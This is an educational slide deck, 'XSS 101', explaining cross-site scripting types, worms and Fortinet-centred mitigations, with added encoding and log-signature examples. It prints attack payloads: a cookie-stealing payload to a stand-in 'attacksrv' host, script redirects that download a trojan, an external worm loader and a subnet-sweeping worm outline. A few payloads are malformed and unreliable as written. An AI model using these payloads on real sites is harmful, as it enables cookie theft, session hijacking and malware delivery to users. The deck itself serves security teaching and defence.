XSS 101 Jason Clark 12/20.


Outline
- XSS Explained
- XSS Types
- XSS "Fingerprinting"
- What can you do with XSS?
- XSS Examples
- Mitigating XSS (Basics and Fortinet)

XSS Explained
- Web app vulnerability that allows code injection and cross-site commands
- Java, PHP, CGI, ASP, HTML, DHTML; e.g. JavaScript provides the ability to create an iframe within a site, thus allowing cross-site commands
- The attack takes advantage of the way HTML code is interpreted by the browser
- The majority of sites do not filter user input, i.e. encoding spaces, #, <, > and XSS characters such as ; " { (within <script> tags)
- Typically involves "social engineering": a spoofed email with an encoded malicious URL
- XSS security is commonly overlooked due to the lack of impact on the server
- XSS can be completely transparent to the client
- A common and evasive attack because the vulnerability is on the client side, i.e. it does not directly attack the vulnerable web server

XSS Explained: Myths
- Myth: XSS always involves "crossing sites", i.e. web defacement, crafted URLs, iframes populated with legitimate websites
- Myth: the user needs to actively select a link or URL
  - XSS attacks can be exploited via HTML emails, message boards, guestbooks...
  - Using onmouseover, users only need to move the mouse over an active link:
    <a href="mailto:xss@xss.com" onmouseover="alert('testing');">XSS</a>
  - Using window.onload, scripts may be executed by simply viewing an email or web page:
    <a href="http://cnn.com" window.onload="alert('document.cookie');">cnn.com</a>
    <script>document.location="http://attacker.com/trojan.exe";</script>


DOM Based
- Document Object Model (DOM): an API which defines how documents are structured and accessed, i.e. it allows XML to be presented as a document on various systems
- Defines cross-domain controls (scripts may not be run across domains, except in the local zone)
- DOM Based XSS: the code is not submitted to the web server (in most cases)
  - RSS pages, IE local pages
  - Also referred to as client-side XSS
  - Bypasses the client-side sandbox
  - Difficult to detect (and secure)
  - http://example.com#evil_code

DOM Based Example
1. Attacker chooses a vulnerable web page on a victim host: the IE7 navcancl.htm design flaw
2. Attacker crafts a link which exploits navcancl.htm:
   res://ieframe.dll/navcancl.htm#http://www.google.com/_____<alter.navcancl.htm>
   res://ieframe.dll/navcancl.htm#http://192.168.1.22/skype/skypeshutdown.html
   Or simply http://google.com#<script>
   Note: all code after the fragment '#' does not get submitted to the server
3. XSS'd! The attacker now has the ability to execute arbitrary code on behalf of the user


Non-Persistent XSS
- Most common XSS attack
- Attacker typically needs to supply a crafted URL to the victim:
  http://legitsite.com/search=<script>document.location="http://attacksite/trojan.exe";</script>
- Client data is processed by server-side scripting, i.e. the server embeds the <script> in the web page, which is then executed by the client browser
- Vulnerable pages will display data without encoding HTML or filtering, i.e. search engines which display the keyword search back to the user
- Search engines, forms...

Non-Persistent XSS Example
1. Attacker determines a vulnerable non-persistent site:
   <script>alert('testing');</script>
   <a href="mailto:xss@xss.com" onmouseover="alert('testing');">XSS</a>
2. Attacker crafts a malicious link to the site containing the instruction script
3. The malicious link is encoded to look "friendly"
4. The malicious link is sent to the end user via email with an intriguing title
5. Depending on the end user's security settings, the user either clicks on the link or it "auto loads"
6. Web server/application executes the malicious JavaScript
7. Stolen cookies, session hijacking: the attacker essentially has the "rights" of the victim
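The search-echo page described in the non-persistent slides, shown as an added example (not code from the presentation): the vulnerable reflection beside an output-encoded version, using the slides' own payload shapes as constructed sample input. Function names and the page template are assumptions.

```javascript
// Added example (not from the slides): a reflected-XSS search echo, first as
// the vulnerable reflection and then with output encoding applied.

// Constructed sample inputs, shaped like the payloads shown in the slides
// (a script tag and an onmouseover handler).
const SAMPLE_SCRIPT = '<script>document.location="http://attacksite/trojan.exe";</script>';
const SAMPLE_HANDLER = '<a href="mailto:xss@xss.com" onmouseover="alert(\'testing\');">XSS</a>';

// Vulnerable: the server pastes the raw query value into the page, so the
// browser parses the injected tag as markup and runs it.
function renderSearchUnsafe(term) {
  return '<p>Results for: ' + term + '</p>';
}

// Encode the five characters HTML treats as markup. '&' goes first so that
// the entities produced for the other four are not themselves re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened: same page, but the user-controlled value is encoded for the HTML
// body context before it is embedded, so the browser shows it as text.
function renderSearchSafe(term) {
  return '<p>Results for: ' + escapeHtml(term) + '</p>';
}

// A link back to the same search: the value is URL-encoded for the query
// string and then HTML-encoded for the attribute it sits in.
function renderSearchLink(term) {
  const href = '/search?q=' + encodeURIComponent(term);
  return '<a href="' + escapeHtml(href) + '">' + escapeHtml(term) + '</a>';
}

// Count raw tag starts ('<' followed by a letter or '/'). Each template above
// contributes exactly two of its own; anything beyond that was injected.
function tagCount(html) {
  return (html.match(/<[a-z\/]/gi) || []).length;
}
```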


Persistent XSS
- Most devastating and furthest-reaching attack
- Typically exploited by allowed (unfiltered) HTML injections
- Similar to non-persistent XSS, though there is no need to provide a crafted URL to the victim
- Unlimited code execution
- A vulnerable message board would typically allow all HTML tags
- User data is stored in a web DB or file system, i.e. guest books, message boards without encoding
- May be used to distribute XSS viruses

Persistent XSS Example
1. Attacker determines a site vulnerable to persistent XSS; ideally the attacker is looking for a high-traffic message board
2. Attacker posts a controversial message with the expectation of multiple views, i.e. "Fortinet announces S1 filing, click here to read more"; or the attacker uses the window.onload function so the script is executed on view
3. Victim selects the link in the message board post, or simply views the page with active code
4. XSS'd! At this point various payload functions can be performed: cookie stealing, Trojan download, key logging, XSS worm propagation
   <img src="javascript:document.location('http://attacksrv/cookies.php'= . (document.cookie));">

XSS Worms
- SCRAPE: utilizes external engines such as xssed.com or search engines to identify victims. The attacker creates dynamic scripts which parse xssed.com, extract attack vector info, then propagate the XSS worm via victim sites
- SPECIFIC: typically targets specific victims. The purpose is to remain on the target, propagating within a single server or app, i.e. the Samy XSS worm (MySpace XSS worm)
- GENERIC: no specific target application; exploits generalized variables (example follows)

XSS Worms Example
1. Attacker posts a link to a vulnerable high-traffic web forum (say 1.0.0.1)
2. Java or PHP scripts utilize a hidden iframe which executes <script src=attackersite/worm.js></script>
3. The script contains a target iframe of 1.0.0.0/8 as well as get_random for running through the remainder of the subnet (exploiting vulnerable sites)
   Note: there is a little more to this, such as "http://" + address + "/index.php"; the random address is inserted in the address and index.php will (hopefully) be resident
4. At this point, each time the page is viewed the script is executed, which in turn runs through the entire class A subnet propagating the XSS worm/virus


Determining Vulnerable Sites
- Public sites: www.xssed.com
- Scanners: Nikto; too many to mention...
- Scripts: use on search boxes, forms, web accounts, bank logins
  <script>alert('xsstesting');</script>
- Firefox: XSS Me, Tamper Data, many more...


What Now: What Can I Do with XSS?
- Cookie theft
- Session riding/hijacking (CSRF)
- False advertisements/free advertising
- Hit stealing
- Identity theft
- Web page defacement
- XSS worm propagation
Tools
- BeEF
- XSS-Proxy
- Backframe
- Java, PHP, CGI, HTML, etc.


XSS Examples and Tools
Scripts
- <script>document.location="http://attacksite/trojan.exe";</script>
- <script> alert(document.cookie) </script>
- <a href=mailto:email@xss.com onmouseover="alert('Hacked');">email@xss</a>
- <a href="javascript: src="http://192.168.1.22:2000/xss2.js">testlink</a>
- res://ieframe.dll/navcancl.htm#http://192.168.1.22/skype/skypeshutdown.html
- about:cancel#http://anysite/");alert("Hacked");//
- <iframe src=http://attacksite.com/script.html>
Tools
- BeEF
- XSS-Proxy
- Backframe
- Java, Perl, CGI, HTML, etc.




Mitigating XSS
- Input filtering: allow only expected/necessary user input
- Web application firewalls (feature request: FortiGate!)
- Antivirus: known XSS worms, phishing emails
- Antispam: potential phishing emails
- JavaScript control: block <script> functions
- FortiGuard Web Filtering: block known malicious sites
- Intrusion Prevention: XSS signatures, custom signatures for user filtering
- End user controls: enforcing browser security
- Patch management: keeping browser/OS patches up to date
- FortiClient! Web, AV, IPS, antispam, anti-grayware
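The "XSS signatures" item above, as an added example that is not part of the presentation: a minimal request-signature check of the kind an IPS or WAF rule applies, run over constructed web-server log lines that carry the slides' payload shapes. The log lines, addresses and function names are constructed for the example; the decoding loop is what keeps a URL-encoded (or double-encoded) payload from slipping past the patterns.

```javascript
// Added example (not from the slides): flag requests whose decoded target
// matches simple XSS signatures, over constructed combined-format log lines.
const SAMPLE_LOG = [
  '10.0.0.5 - - [20/Dec/2007:10:01:02 +0000] "GET /search?q=fortinet HTTP/1.1" 200 512',
  '10.0.0.9 - - [20/Dec/2007:10:02:15 +0000] "GET /search?q=%3Cscript%3Ealert(%27xsstesting%27)%3C/script%3E HTTP/1.1" 200 611',
  '10.0.0.9 - - [20/Dec/2007:10:02:40 +0000] "GET /guestbook?msg=%253Cscript%253E HTTP/1.1" 200 400',
  '10.0.0.7 - - [20/Dec/2007:10:03:01 +0000] "GET /profile?name=%3Ca%20onmouseover%3D%22alert(1)%22%3Ex HTTP/1.1" 200 300',
];

// Coarse signatures for the payload shapes in the slides: script and iframe
// tags, inline event handlers (onmouseover=...) and javascript: URLs.
const SIGNATURES = [/<\s*script/i, /<\s*iframe/i, /\bon[a-z]+\s*=/i, /javascript\s*:/i];

// Decode until the string stops changing (bounded), so a double-encoded
// value (%253C -> %3C -> <) is compared in its final form.
function fullyDecode(value) {
  let prev = value;
  for (let i = 0; i < 3; i++) {
    let next;
    try {
      next = decodeURIComponent(prev.replace(/\+/g, ' '));
    } catch (e) {
      return prev; // malformed escape: compare what we have
    }
    if (next === prev) return next;
    prev = next;
  }
  return prev;
}

// Pull the request target out of a combined-format log line.
function requestTarget(line) {
  const m = line.match(/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Return the source of every signature that matches the decoded target.
function matchXss(line) {
  const target = requestTarget(line);
  if (!target) return [];
  const decoded = fullyDecode(target);
  return SIGNATURES.filter((re) => re.test(decoded)).map((re) => re.source);
}

// Scan a batch of lines and keep only the flagged ones with the client IP.
function scanLog(lines) {
  return lines
    .map((line) => ({ ip: line.split(' ')[0], hits: matchXss(line) }))
    .filter((r) => r.hits.length > 0);
}
```

A real rule set would be broader and would also look at POST bodies and headers; the point here is the decode-before-match step and that the benign search line is left alone.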

The End
Disclaimer: This presentation is meant to educate the security professional in hopes of creating awareness of Cross Site Scripting. I am not responsible for any scripts contained, or the use thereof, within this documentation.